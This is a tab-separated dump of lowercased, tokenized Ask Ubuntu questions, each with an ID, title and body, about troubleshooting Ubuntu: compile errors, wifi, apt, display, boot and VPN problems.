407682	error : ‘strlen’ was not declared in this scope	i am trying to compile several third-party software from source code ( i.e . zchaff , argosat ) and get errors such as : error : ‘strlen’ was not declared in this scope error : ‘strcmp’ was not declared in this scope here 's the full error message text ( also on ubuntu pastebin ) : erelsgl @ erel-biu : ~/dropbox/theorem-prover/argosat-1.0 $ make make all-recursive make [ 1 ] : entering directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0' making all in src make [ 2 ] : entering directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0/src' making all in strategies make [ 3 ] : entering directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0/src/strategies' /bin/bash ../../libtool -- tag=cxx -- mode=compile g++ -dhave_config_h -i . -i../.. -i../../src -i../../src/auxiliary -i../../src/basic-types -ffloat-store -wall -woverloaded-virtual -ansi -pedantic -wno-strict-aliasing -dndebug -o3 -mt libstrategies_la-restartstrategy.lo -md -mp -mf .deps/libstrategies_la-restartstrategy.tpo -c -o libstrategies_la-restartstrategy.lo `test -f 'restartstrategy.cpp ' || echo './'`restartstrategy.cpp g++ -dhave_config_h -i . -i../.. -i../../src -i../../src/auxiliary -i../../src/basic-types -ffloat-store -wall -woverloaded-virtual -ansi -pedantic -wno-strict-aliasing -dndebug -o3 -mt libstrategies_la-restartstrategy.lo -md -mp -mf .deps/libstrategies_la-restartstrategy.tpo -c restartstrategy.cpp -o libstrategies_la-restartstrategy.o in file included from ../../src/solverlistener.hpp:22:0 , from restartstrategyconflictcounting.hpp:24 , from restartstrategyminisat.hpp:22 , from restartstrategy.cpp:22 : ../../src/basic-types/literal.hpp : in static member function ‘static void argosat : :literals : :shufflevector ( std : :vector < unsigned int > & ) ’ : ../../src/basic-types/literal.hpp:83:23 : error : ‘rand’ was not declared in this scope restartstrategy.cpp : in static member function ‘static argosat : :restartstrategy* argosat : :restartstrategy : :createfromcmdline ( argosat : :solver & , int , char** , int ) ’ : restartstrategy.cpp:33:40 : error : ‘strcmp’ was not declared in this scope restartstrategy.cpp:35:37 : error : ‘strcmp’ was not declared in this scope restartstrategy.cpp:37:37 : error : ‘strcmp’ was not declared in this scope restartstrategy.cpp:39:34 : error : ‘strcmp’ was not declared in this scope restartstrategy.cpp:41:36 : error : ‘strcmp’ was not declared in this scope restartstrategy.cpp:43:41 : error : ‘strcmp’ was not declared in this scope make [ 3 ] : *** [ libstrategies_la-restartstrategy.lo ] error 1 make [ 3 ] : leaving directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0/src/strategies' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/erelsgl/dropbox/theorem-prover/argosat-1.0' make : *** [ all ] error 2 erelsgl @ erel-biu : ~/dropbox/theorem-prover/argosat-1.0 $ i found in other questions , such as http : //stackoverflow.com/questions/4564850/strlen-was-not-declared-in-this-scope-c , that these errors can be solved by inserting `` include '' statements into the source code . but , i downloaded the source code from other sites and i am pretty sure it works for them as is . so , why does n't it work for me ? ( i have ubuntu 12.04.4 , g++ 4.6.3 )
407684	wine1.7 can not be uninstalled completely	i uninstalled wine 1.7 by apt-get remove wine1.7 . but i found the programs i installed in .wine can still run . how can i uninstall them ?
407689	slingbox tv streamer	as a newbie to ubuntu , i have tried to access my slingbox tv sender , but a message comes back from slingbox saying that this os ( ubuntu0 is not supported ! does anyone know a way round this ? or will i have to go back to windows ? thanks
407690	ca n't install or update anything	i tried to update using sudo apt-get update but the following error occured : elease rename failed , read-only file system ( /var/lib/apt/lists/ppa.launchpad.net_octave_stable_ubuntu_dists_precise_release - > /var/lib/apt/lists/ppa.launchpad.net_octave_stable_ubuntu_dists_precise_release ) . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release rename failed , read-only file system ( /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_release - > /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_release ) . w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release rename failed , read-only file system ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_release - > /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_release ) . w : failed to fetch http : //ppa.launchpad.net/transmissionbt/ppa/ubuntu/dists/precise/release rename failed , read-only file system ( /var/lib/apt/lists/ppa.launchpad.net_transmissionbt_ppa_ubuntu_dists_precise_release - > /var/lib/apt/lists/ppa.launchpad.net_transmissionbt_ppa_ubuntu_dists_precise_release ) . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release rename failed , read-only file system ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_release - > /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_release ) . w : some index files failed to download . they have been ignored , or old ones used instead . w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . what 's the problem ?
407693	what 's the real , working approach to change my mac address	i want to change my wifi mac address . i tried a plenty of ways such as http : //www.upubuntu.com/2013/05/change-mac-address-using.html , how to change wlan0 mac adress ? and ifconfig wlan0 down ifconfig wlan0 hw ether 00:1e:68:35 : ff:91 ifconfig wlan0 up and other but nothing helped . or i did something wrong . is there any correct , 100 % working way to do that ?
407694	how to reset wifi settings ?	i was experimenting with wifi settings and after that i 've set everything back but does n't work as it was before . is there a way to reset wifi setting as it was at the first start ?
407696	is libmysqlclient-dev package needed if i 'm not goung to develop anything ?	i am just curious . i 've got libmysqlclient-dev with my default installation of ubuntu . the description of the package says it contains `` development libraries and header files . '' do i need this stuff when i 'm going to run mysql binaries only ? i 'm not going to compile anything . are there any other packages containing source code in ubuntu i do n't actually need ?
407699	lxc 0.9.0 error	i am using lxc 0.9.0 and which we compiled and then created busybox container named 'yashu' but started it , it gives following error yashu @ yashu-pc : ~ $ sudo lxc-start -n yashu lxc-start : failed ( 98 ) to create the command service point /usr/local/var/lib/lxc/yashu/command lxc-start : # # lxc-start : # the container appears to be already running ! lxc-start : # # lxc-start : failed to initialize the container please help
407702	can google earth 7.x work normally ?	i was using google earth 6.2 on ubuntu 13.10 , and it works fine , but i want newest version . in the new version , the problem is with panoramio photos . i think it 's very important to make this work in earth , but in v7.x if you open image from a place , it shows white ( with location text ) , or it just crash application . can not use earth browser plugin because it 's only available on windows or mac . has anybody solved that problem and how . thank you .
407705	how do i disable < control > < alt > s to allow myself to launch sublime ?	i 've been using sublime text 2 quit a bit lately and want to make it as easy to launch as terminal . i 've done the following so far : i went into system settings > keyboard > shortcuts > windows and disabled the shortcut for toggled shaded ( ctrl + alt + s ) . i used gconf-editor to add < control > < primary > < alt > s under apps/metacity/global_keybindings/run_command_1 and pointed it to /usr/bin/sublime under apps/metacity/keybinding_commands/command_1 . i went into dconf-editor and changed the toggle shadows shortcut to < control > < super > s under org/gnome/desktop/wm/keybindings . i am still unable to launch sublime with the shortcut ctrl + alt + s , and normal windows still keep being toggled with the shortcut . i 'm using ubuntu 12.04 , any suggestions on what i am doing wrong ?
407706	how can control my brightness of the display on hp nseries laptop	i just bought a new laptop and i have installed windows 8 and ubuntu 12.04 on it . and while using ubuntu i am not able to control my brightness with the dedicated keys or the softwares such as brightness controller and brightness indicator . i have also tried to search the brightness directory with the command grep . /sys/class/backlight/* and this is showing no such file or directory error . so what should i do now.. i have also tried making changes in the grub file . i have added acpi_backlight=vendor in the grub cmdline default line ... please help my laptop is working in max brightness and its difficult to work ...
407707	how can i display laptop screen on the tv by hdmi in kubuntu	i have installed kubuntu 13.10 on my laptop . my problem is when i connect hdmi cable between my laptop and tv . two screens will work : *screen 1 ( laptop ) *screen 2 ( tv ) how can i change them to be single screen that my work on the laptop will appear at the same time on tv ? i was using ubuntu and it was easy to change it from the appearance but from kubuntu i couldn't
407708	how to create a menu item for eclipse in ubuntu 13.10 ?	i upgraded eclipse yesterday to version 4.3 and was faced with the missing menus bug . to get the menus back one has to start eclipse in a different way , thus i tried to create a new item in the main menu . for some reason the item is not stored by the main menu , i get no error messages when i click the ok button in the new item dialogue , but nothing changes in the application group . am i doing something wrong ? thanks . update i : user wilf tells me to add a file named eclipse.desktop in /usr/share/applications but this has not created an new item in the main menu : update ii : here 's how my eclipse.dektop file looks like : $ ls -la /usr/share/applications/e* -rw-r -- r -- 1 root root 3083 may 11 2012 /usr/share/applications/easytag.desktop -rw-r -- r -- 1 root root 167 jan 25 17:02 /usr/share/applications/eclipse.desktop -rw-r -- r -- 1 root root 921 oct 31 20:30 /usr/share/applications/empathy.desktop -rw-r -- r -- 1 root root 856 jun 29 2013 /usr/share/applications/eog.desktop -rw-r -- r -- 1 root root 894 oct 8 23:21 /usr/share/applications/evince.desktop -rw-r -- r -- 1 root root 873 oct 8 23:21 /usr/share/applications/evince-previewer.desktop $ cat /usr/share/applications/eclipse.desktop [ desktop entry ] type=application name=eclipse icon=eclipse exec=env ubuntu_menuproxy=/usr/local/eclipse.kepler/eclipse terminal=false categories=development ; ide ; java ; beyond this , is there any other way to get the eclipse icon showing up in the dash ?
407711	auto rip cd with morituri ( or launch custom script on cd insert )	how can i automaticaly start ripping my cd when i insert a cd . there used to be a custom command option in the settings where you could run a custom command on cd insert . the i could use a bash script to start the ripping . but that option is n't there anymore and i can only use programs ? i 'm trying some things with udev but i had little success /etc/udev/rules.d/10-srx_change.rules subsystem== '' block '' , kernel== '' sr0 '' , env { id_cdrom_media_cd } == '' 1 '' , run+= '' /home/user/morituri.sh ''
407714	do ubuntu repos/servers perform log analysis to identify & block retrieval program ?	many server administrators want their server to be used only by humans and not by retrieval programs like wget . one way to block such programs is to use log analysis . log analysis identifies retrieval programs by looking for statistically significant similarities among the requests , often through timing . whenever i try to use wget to download packages through a shell script ( one similar to those created by synaptic , mostly they are actually created by synaptic ) , only a few packages are downloaded and most of the packages fail to download due to connection refusal . so i strongly think that the most probable reason why the connection is refused is that ubuntu servers use log analysis to block programs . do ubuntu servers use log analysis to block ( package retrieval ) programs ? edit : i executed some scripts which contained packages of small size ( i.e. , they would get downloaded in less time ) . such scripts work properly as expected . the error comes up with packages that are large in size ( consequently they take more time ) .
407717	wireless joypad to be used with steam	i would like to use a sturdy ps3 like joypad with ubuntu 12.04 and steam . many games in steam require an xbox-like pad , so xboxdrv might come into rescue . currently i can easily plug in my ps3 pad and emulate an xbox 360 with xboxdrv ; only issue is that i 'd like to use it in wireless mode and apparently is not so easy to have both ( xboxdrv emulation and wireless ) . what joypad with such feats would you recommend to buy ? thanks , ema
407718	how to install python 3.4 properly on saucy ?	for my project i need python 3.4 ( beta 2 ) for its asyncio module , but there is no official package for ubuntu yet ( unlike windows , which has an msi already ) . i 'd like to know how can i install python 3.4 ( beta 2 ) from the downloadable tarball without breaking my system . by not breaking my system i mean that i can use the update-alternatives and env scripts , have the python3.4 and pip3.4 binaries without conflicts , etc . as usual on ubuntu . as far as i know the default make script does not 100 % respect default system paths in ubuntu ( i previously had problems installing python 2.7.4 before the official deb package came out for it ) .
407720	can not login to ubuntu after startx command	i wanted to manually configure the internet settings & decided to seek help from this website . ubuntu did not allow me to perform step 1 saying , x : user not authorized to run the x server , aborting so i logged in as superuser by executing sudo -s. then i executed step 1 . suddenly all the tray icons disappeared & the only thing that was being displayed was the wallpaper . i was n't able to shutdown/restart & chose to shutdown the laptop directly with power button . upon restart , i had the following problems , problems : i am able to login with a guest account . i 'm unable to login with my user account . logging in brings me back to the login screen . i am using ubuntu 13.04 . how can i fix this ?
407725	how can i encode wav to mp3 in dolphin from contextmenu on xubuntu ?	i have a music folder with lots of wav files . is it possible to get a rightclick menu for wav files to encode them into mp3 or flac ?
407728	problem when booting ubuntu ( libkmod : error )	when i 'm booting my computer , i 'm getting to the screen where i can choose between ubuntu studio gnli/linux ( low latency ) ubuntu studio gnli/linux doing a memory test or opting for further options in starting ubuntu . when opting for the first two options , this error code appears on blackscreen : libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/alsa-base.conf line 11 : ignoring bad line starting with # install when opting for memory test , the test is done without any difficulties . when starting a former ubuntu version , the same error as above appears . my system is : ubuntu studio with linux 3.11.0-15 thanks for your help !
407730	dell 1525 on ubuntu 13.10 allows only 2 resolutions on external monitor	as i wrote in the title , my laptop is dell 1525 and i have a acer monitor connected to the vga port . the problem is that the monitor 's native resolution is 1366x768 , and i can see only 800x600 and 1024x768 on the unknown display . lpci | grep vga command shows $ 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) and one more thing why when i move the mouse between the screens when i move it slowly it kinda stucks on the edges of the monitor ?
407735	problem with cisco vpnc	i am running ubuntu 12.04 and i want to connect cisco vpn from my system . i have the following package installed on my computer . vpnc i have configured everything . cd /etc/vpnc/default.conf ipsec gateway xxxx.xxxx.in ipsec id xxxxxxxx ipsec secret xxxxx xaut username xxxxx xauth password xxxxx ike authmod psk i am getting below error : vpnc : server required domain , but none set ( use `` domain ... '' in config or -- domine ) any help appreciated .
407736	remove top and bottom gnome panels in ubuntu 12.04	background : i developed a python desktop application which is run on the top of ubuntu 12.04 and it is running in full screen mode . i used gnome-fallback as a ubuntu desktop . question : my problem is delete top and bottom gnome panels permanently and i know how to do it from gui itself ( alt + right click ) . but i need to do it from the commands . anyone have an idea about that . thanks in advance .
407743	convert time stamp to seconds in bash	as far as i know , bash variables do not have a certain type . my problem is , i need to convert a time stamp ( always in format : hh : mm : ss ) to a single integer representing seconds . so i cut the hh , mm and ss parts into separate strings and use expr to calculate the seconds integer like : time=expr $ hh \* 3600 + $ mm \* 60 + $ ss but when e.g . $ hh=00 then expr wo n't work . is it possible to convert strings like 00 or 01 to integers ?
407744	apache does n't execute php files , but makes me download them	so i setup my server using this tutorial , and when the test.php file works with no problem when i enter the address using my server 's ip as http : //1.2.3.4/test.php however , if i use virtualhosts , the browser just offers to download the file rather than executing it . so this : http : //blog.mydomain.com/test.php offers to download the file rather than executing the script . the code i use in /etc/apache2/apache2.conf for virtual hosts is the following : include /etc/phpmyadmin/apache.conf include /etc/apache2/mods-available/php5.conf < virtualhost *:80 > documentroot /path/to/vhosts/folder1 servername www.mydomain.com < /virtualhost > < virtualhost *:80 > documentroot /path/to/vhosts/folder2 servername blog.mydomain.com < /virtualhost > namevirtualhost *:80 though i have to say that when i restart the apache2 server i get a warning message : [ ... . ] restarting web server : apache2 [ sun jan 19 13:33:40 2014 ] [ warn ] namevirtualhost *:80 has no virtualhosts ... waiting [ sun jan 19 13:33:41 2014 ] [ warn ] namevirtualhost *:80 has no virtualhosts
407745	how to install the 'pgfplot ' package in lubuntu ?	how can i install the pgfplot package in lubuntu ? for information , i use texstudio , i searched in it for a while for a wysiwyg tool that can manage tex packages but did n't find .
407746	can not access ubuntu from windows 8	i have tried installing ubuntu from a dvd for like 3 times . every time is completes successfully . after successful installation it tells me to remove the dvd and restart my computer . after restarting it directly starts windows 8 . i thought the problem maybe of default os . so i read the guide on the microsoft site about changing the default os . here is the link . but i could n't see ubuntu in the boot menu in system configuration . i have tried searching for answers but i could n't get the answer . please help me . my laptop config is i5 , 1tb hard disk , 64 bit os and 4gb ram . i do n't think the laptop config is the problem .
407747	only part of crontab working	i have a line in crontab : * * * * * date > > /home/pana/temperatures.txt ; hddtemp /dev/sda > > /home/pana/temperatures.txt ; hddtemp /dev/sdb > > /home/pana/temperatures.txt ; sensors > > /home/pana/temperatures.txt ; printf `` _________________________\n '' > > /home/pana/temperatures.txt and all i get is date , then double nothing , then sensors output and then printf . hddtemp do not write output . that file is 777 , code is inserted through sudo crontab -e. syslog : jan 19 14:17:01 knedlik cron [ 7099 ] : ( cron ) info ( no mta installed , discarding output ) jan 19 14:18:01 knedlik cron [ 7108 ] : ( root ) cmd ( date > > /home/pana/temperatures.txt ; hddtemp /dev/sda > > /home/pana/temperatures.txt ; hddtemp /dev/sdb > > /home/pana/temperatures.txt ; sensors > > /home/pana/temperatures.txt ; printf `` _________________________\n '' > > /home/pana/temperatures.txt ) it is probably something dumb , but i cant see it !
407748	which command locks screen with lightdm ?	i used to lock screen with this command , but it stopped working recently , probably after update . i 'm running version= '' 13.10 , saucy salamander '' . how can i restore this function ? $ gdmflexiserver method return sender=:1.10 - > dest=:1.97 reply_serial=2 i used to invoke this command with openbox keybinding : < keybind key= '' xf86screensaver '' > < action name= '' execute '' > < execute > gdmflexiserver < /execute > < /action > i think it used to work from terminal emulator as well . update : to my surprise , it works again . this might be because of system update . method return sender=:1.10 - > dest=:1.71 reply_serial=2
407749	use canon mx510 as scanner	i 'm trying to scan from my canon pixma mx515 via the network . what i 've tried so far : simplescan recognizes scanner , but says it could n't establish a connection . xsane tells me error while opening pixma : mx510_pixmamx515.local:8612 : operation not supported added bjnp link to /etc/sane.d/pixma.conf , problem stays . vuescan works without problems , but i do n't want to pay $ 40 just to be able to use my scanner . note : man sane-pixma says that mx510 series is included , but marked as experimental and may still need some work . what can i do to get the scanner working ? printing ( ipp ) works without problems . i 'm using raring x64
407758	ssd spindown settings	i have dual ssds in my new laptop , but the second ssd is n't used as often . does `` spin-down '' have any affect on ssds for preserving battery life ? is there a delay in ssds in the event that the device is needed again ? does it actually shut off the device 's circuitry ( saving power ) or does it just put the hdd into a special spun-down mode which would n't be implemented on an ssd . overall , should i set aggressive `` save power '' settings on the secondary ? should i do the same for the primary ? thanks !
407763	is there any real skype alternative where i can add my skype friends ( without asking them to join to a new app ) ?	i have installed skype but , despite the recent updates , it still seems to have bugs . anyway , i am looking for an alternative for it , and i saw from internet that there are plenty of open source alternatives to skype : ekiga , linphone . blink , jitsi , empathy so on . anyway , i did not installed and tried any of those , except for empathy which looks promising but it was a big disappointment to me and i will unistall it . so , the idea is : what other app should i use in order to keep contact with my skype friends ? i do n't wont to install , let 's say , ekiga , and then ask my friends to create ids on ekiga . i do n't think is polite from my part to ask/force people to change their software just because it does n't fit my taste . as a windows user , i did used yahoo messenger and gtalk app . now , when i 'm on linux , i use pidgin to chat with my friends from both these accounts . well , i need something like pidgin , but for skype . i need an app which i can use with my skype id and i can add my skype friends to it , without having to ask them to join the new app . in extremis , i am willing to create an id for the new app , but i still need to add my skype friends to it in the conditions mentioned above . is there any such app where i can import my skype friends ( just like i did with my ym and gtalk friends in pidgin ) ?
407767	i get a black screen while installing ubuntu	when i started installing ubuntu 12.04 the loading screen appeared , but later the display gets off . it blacked out with no display . my pc config : intel core i3 2100 @ 3.10 ghz 4 gb transcend ram 500 gb harddisk nvidia gtx 650ti 1 gb gdd5
407769	lubuntu boots into grub	i installed lubuntu from windows xp ( c : / ) into a seperate partition ( d : / ) . it installed correctly ( as it seemed ) and then when i rebooted the system and choose lubuntu from the boot menu , a black command line interface called grub appeared . how can i load into the gui version please ? would really appreciate some assistance . btw i had the same setup before and lubuntu was working just fine , until yesterday .
407771	make kde widgets unresponsive to mousewheel	is there a way to prevent change of tabs with mouse wheel in plasma desktop widgets . for example tabs of task manager and virtual desktops . i want them be unresponsive to mouse-wheel even if mouse pointer is hovering over them .
407775	facebook chat history	i would like to ask , if it is possible in empathy to have facebook chat history , because empathy shows only messages sent/received specifically on this device and not from my other pc or my android . thank you for your help .
407780	does geary have a command flag to compose new email ?	i 'm trying to update message menu indicator and i want to import some geary funtions as well , does geary have any flags similar to thunderbird ( -- compose ) ? i tried geary -- ? but did n't find any relevant info .
407782	pc not booting from ubuntu live dvd	so finally i can enter my bios ! so , i decided to boot through ubuntu today and went into bios . i changed my boot device to cd/dvd , saved the settings ( f10 ) and then it restarted or something . but , then it did n't boot through ubuntu but it booted xp . i tried it 3 times and all the times it booted xp . then i changed the boot setting . and the it booted neither xp nor ubuntu . i get this error : '' reboot and select proper boot device or insert boot media in selected boot device and press a key_ '' ( without the quotation marks ) what could be the problem ? i tried using another dvd . there is same problem with it ! what should i do ? for more see this : ( important if you need to understand more ) http : //linustechtips.com/main/topic/104137-pc-not-booting-from-dvd/ # entry1392823 thanks : )
407784	usb memory stick is `` broken '' after files are copied	i have installed on my computer both ubuntu 13.10 and windows 8 and lately noticed that while a large file is copied with 5-6 mb per second on windows 8 its transferred with up to 80 mb per second on the ubuntu 13.10 . what i am doing is downloading movies , copping them on a usb stick and watch them on my tv . so , because the speed on ubuntu is better , a prefer to do the downloading and copying part using it . the issue is so far , i have not successfully copy anything . i am using three different usb sticks formatted as ntfs and all copy operations are falling . firstly , the files are transferred but when i eject/inject the usb again , i get the following error : error mounting /dev/sdb1 at /media/gotqn/joro : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/gotqn/joro '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i have firstly thought that there might be something with the usb sticks themselves , so i have formatted them using gparted to ntfs again but nothing changes . when i formatted the sticks on windows 8 and copied the files , everything is ok. how to fix this ?
407786	how to reset ( gtk ? ) color scheme ?	ubintu 12.04 , xfce 4.8 , openbox-3.5.0-2ubuntu2 . i noticed that some applications have toolbars with a solid black background . i tried to reset it using `` settings editor '' but did n't find necessary key-value pair . this solution did n't help too : gsettings set org.gnome.desktop.interface gtk-theme '' gsettings set org.gnome.desktop.wm.preferences theme '' gconftool-2 -- set -- type string /apps/metacity/general/theme '' any ideas ?
407787	ubuntu-html5-container but it is not going to be installed ?	the following packages have unmet dependencies : ubuntu-sdk : depends : ubuntu-html5-container but it is not going to be installed
407790	when dual booting ubuntu before windows 7 what type of file system should ubuntu be set to ?	i have an acer that originally ran win8 but i wanted to install ubuntu . i did and kept it on for a while . i am now attempting to dual boot windows . i have successfully installed windows and partitioned my hdd by using gparted . however , ubuntu will not show up in my boot menu . i am not sure of what file system to set the ubuntu partition to in order for it to show up in my boot menu . i am afraid that i may have just overwritten it , but it is still there in the gparted gui . i really need some help quick ! ! ! ) :
407796	run ubuntu on minimal resources ( run terminal only )	i 'm setting up an `` old '' pc to run servers for some games and i would like to free up as much processing speed and ram as possible . my first idea is to shut down everything that is n't necessary and run everything from the tty1 terminal ( ctrlaltf1 ) . i do n't need any gui 's to run game servers so just a terminal will be enough . anyone any idea if this will work and i should do this or if i should just go and look for another way . i do n't want to resize my harddrive to fit in a lighter distribution ( if i really have to i will do this but i 'm looking for ways to get as much resources as possible in ubuntu 13.04 )
407797	how can i get ubuntu 12.04 lts to show magellan 4050 gps by usb ?	how to get ubuntu 12.04 lts to show magellan 4050 gps with usb ?
407800	wifi is not working on hp pavilion nseries	wifi is not working on my laptop hp pavilion nseries.. any help on how can i make it work.. i have already tried the steps in the following link : hp pavilion 15-e043cl amd - wifi not working any help would be appreciated ? ?
407805	dual monitor full screen problems	i have a dual monitor setup and with a lot of programs when i hit `` alt+enter '' to full screen them i get half on one monitor and half on the other . or , i 'll get half on my main monitor and half ... nowhere . any ideas ?
407808	webgl not working neither in firefox nor chrome	i 'm using ubuntu 13.10 and finally managed to install the correct drivers for my nvidia card ( using bumblebee ) and glxinfo finally shows that i support opengl 4.20 . so , lastly , for the project i 'm working on , i need to get webgl running in either chrome or firefox ( i 'd rather use in chrome ) to test the program i 'm developing . i believe this may be a conflict with my on-board intel hd5000 maybe ? when i try to run the webgl .html file in firefox i get this in the terminal : ( process:8315 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table attention : default value of option force_s3tc_enable overridden by environment . opengl warning : unimplemented glxmakecurrent call with glxpixmap passed , unexpected things might happen . opengl warning : failed to get windows geometry for 0x7ff7e0b8d800 , try xwininfo opengl version detected : 210 opengl warning : unknown program 0 opengl version detected : 210 opengl warning : unknown program 0 opengl version detected : 210 opengl warning : unknown program 0 opengl warning : unimplemented glxmakecurrent call with glxpixmap passed , unexpected things might happen . opengl warning : failed to get windows geometry for 0x7ff7d14b3800 , try xwininfo opengl version detected : 210 opengl warning : unknown program 0 opengl warning : unimplemented glxmakecurrent call with glxpixmap passed , unexpected things might happen . opengl warning : failed to get windows geometry for 0x7ff7d14b3800 , try xwininfo opengl version detected : 210 opengl warning : unknown program 0 and in chrome i get the following : opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table attention : default value of option force_s3tc_enable overridden by environment . opengl warning : glxchoosefbconfig returning null , due to attrib=0x2 , next=0x20 [ 8501:8501:0119/161214 : error : gl_surface_glx.cc ( 739 ) ] glxchoosefbconfig failed . [ 8501:8501:0119/161214 : error : gpu_info_collector.cc ( 27 ) ] gfx : :glcontext : :createoffscreenglsurface failed [ 8501:8501:0119/161214 : error : sandbox_linux.cc ( 142 ) ] initializesandbox ( ) called with multiple threads in process gpu-process opengl warning : glxchoosefbconfig returning null , due to attrib=0x2 , next=0x20 [ 8501:8501:0119/161214 : error : gl_surface_glx.cc ( 739 ) ] glxchoosefbconfig failed . [ 7:7:0119/161214 : error : command_buffer_proxy_impl.cc ( 164 ) ] failed to initialize command buffer service . opengl warning : glxchoosefbconfig returning null , due to attrib=0x2 , next=0x20 [ 8501:8501:0119/161214 : error : gl_surface_glx.cc ( 739 ) ] glxchoosefbconfig failed . [ 7:7:0119/161214 : error : command_buffer_proxy_impl.cc ( 164 ) ] failed to initialize command buffer service . my nvidia card is a 765gtxm . when i run the exact same file in windows everything runs smoothly .
407810	how do i mount iso files inside a virtual drive ?	if i want to run a program from a iso but the program runs in windows , thus running it from play on linux . i would like to know if i have to install the mounting program inside the virtual drive through play on linux , or if it does n't matter . also what would be the step by step way of doing this , and what would be the best and easiest programs for tasks like this ?
407812	atheros wifi not workong on ubuntu 10.04 lts	i installed backport 3.10.2 driver on ubuntu 10.04 lts but not working wireless network no display wireless icon lsmod |grep ath9k i confirm that ath9k module loaded on kernel .
407813	why is the wifi network visible to everybody but me ?	recently my flatmate changed the maximum number of devices that can connect to our wifi and since then i can not see our wifi network . i am the only one in my household using ubuntu . i logged into our rooter using a webbrowser and i can see other people 's non-ubuntu devices connected and working flawlessly . their owners can see the wifi and can connect anytime . when i connect by cable , i can see my computer too , but it is not possible to connect wirelessly . here are the things i tried : i checked that i am not blacklisted - i am not i tried to `` connect to hidden wifi network '' , entered ssid and password - no effect i restarted the router multiple times - no effect please , what can be causing this and what can i do next ? edit : i am using an orange livebox and here is a screenshot of the devices connected :
407815	how to format pc and add ubuntu alone ?	i have windows 7 and ubuntu in my pc . my ubuntu is not having speed as i did n't install it correctly . so i would like to clean my pc completely and add ubuntu alone ( without windows ) . how should i proceed ?
407817	after deactivating networkmanager , how do i add the dns server address to resolv.conf ?	i deactivated networkmanager with sudo apt-get remove network-manager because i want to have all network configuration in /etc/network/interfaces . after system restart , i see that cat /etc/resolv.conf is empty . cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten it seems the dns server address need to be configured manually . is this the right conclusion ? how would i add the address of the dns server to /etc/resolv.conf ?
407820	webinar service that works on ubuntu	i am looking for a webinar service that works for ubuntu both for participants and presenters . i tried anymeeting.com but it does not work for presenters . gotomeeting says they work for windows / mac but nothing about linux .
